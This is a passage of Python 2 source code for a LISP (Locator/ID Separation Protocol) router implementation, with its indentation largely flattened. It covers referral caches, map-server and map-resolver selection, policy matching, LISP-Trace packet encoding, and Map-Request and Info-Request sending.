if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
            s.bind((device, 0))
            self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
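#
# Example of the encoding used above (illustrative only): the string
# "2024-06-01-12:30:00" parses to the integer 20240601123000, so
# future(), past(), and now_in_range() reduce to integer comparisons.
#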
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
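    #
    # Match semantics, restating the loop above: within one match clause
    # every configured test must pass (logical AND); the clauses themselves
    # are tried in order and any one passing clause is a match (logical OR).
    #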
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
        #endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
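#
# Illustrative encode/decode round-trip for lisp_trace (a sketch for a local
# test context; nothing in this file runs it):
#
#   t = lisp_trace()
#   t.packet_json = [{"node" : "ITR", "srloc" : "10.0.0.1"}]
#   r = lisp_trace()
#   assert r.decode(t.encode())
#   assert r.nonce == t.nonce and r.packet_json == t.packet_json
#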
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
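#
# Illustrative sketch (hypothetical name, a stand-in for the lisp_ip_checksum()
# referenced above): the standard one's-complement sum over a 20-byte IPv4
# header without options. When run over a header whose checksum field already
# holds a correct value, the result is 0, which is the property the
# verification logic above relies on.
#
def example_ipv4_header_checksum(header):
    import struct
    checksum = 0
    for i in range(0, 20, 2):
        checksum += struct.unpack("!H", header[i:i+2])[0]
    #endfor
    #
    # Fold carries and return the one's-complement of the sum.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += (checksum >> 16)
    return((~checksum) & 0xffff)
#enddef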
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
    # RLOC-probe. We use probe_port of 4341 so the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
    # Hold request nonce so we can match replies from xTRs that have multiple
    # RLOCs, since the reply's source address may not be the probed
    # destination. And in our ETR implementation, we can get the probe request
    # destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
if (nat_info and len(lisp_sockets) == 4):
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest,
nat_info, packet)
return
#endif
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
        # and lisp-etr processes are in this routine at the same time. We
        # wait for the host route to go away before proceeding. We will use
        # the map-server host route as an IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
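#
# Illustrative sketch (hypothetical, a simplified stand-in for the
# lisp_get_default_route_next_hops() called above) of parsing the "ip route"
# output shown in the comments, assuming the Python 2 'commands' module.
# Returns (device, next-hop) pairs, the shape iterated over above.
#
def example_get_default_next_hops():
    import commands
    output = commands.getoutput('ip route | egrep "default via"')
    next_hops = []
    for line in output.split("\n"):
        tokens = line.split()
        if (len(tokens) < 5): continue
        if (tokens[0:2] != ["default", "via"]): continue
        next_hops.append((tokens[4], tokens[2]))
    #endfor
    return(next_hops)
#enddef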
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
